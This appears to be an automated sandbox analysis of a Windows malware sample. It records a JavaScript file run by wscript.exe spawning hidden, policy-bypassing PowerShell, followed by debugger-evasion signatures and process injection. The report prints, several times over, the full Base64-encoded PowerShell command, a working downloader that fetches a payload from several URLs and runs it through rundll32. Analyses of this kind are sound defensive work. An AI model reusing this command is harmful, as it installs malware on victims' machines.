AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA=="
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Azpq.js" Pinbrain AlphanumericBristles hyperbarbarismPhenazine
parent_process wscript.exe martian_process wscript "C:\Users\test22\AppData\Local\Temp\Azpq.js" Pinbrain AlphanumericBristles hyperbarbarismPhenazine
parent_process wscript.exe martian_process powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA=="
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA=="
Process injection Process 3048 resumed a thread in remote process 2188
Process injection Process 2188 resumed a thread in remote process 2384
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 2188
1 0 0

NtResumeThread

thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 2384
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -nologo value Hides the copyright banner when PowerShell launches
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -nologo value Hides the copyright banner when PowerShell launches
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
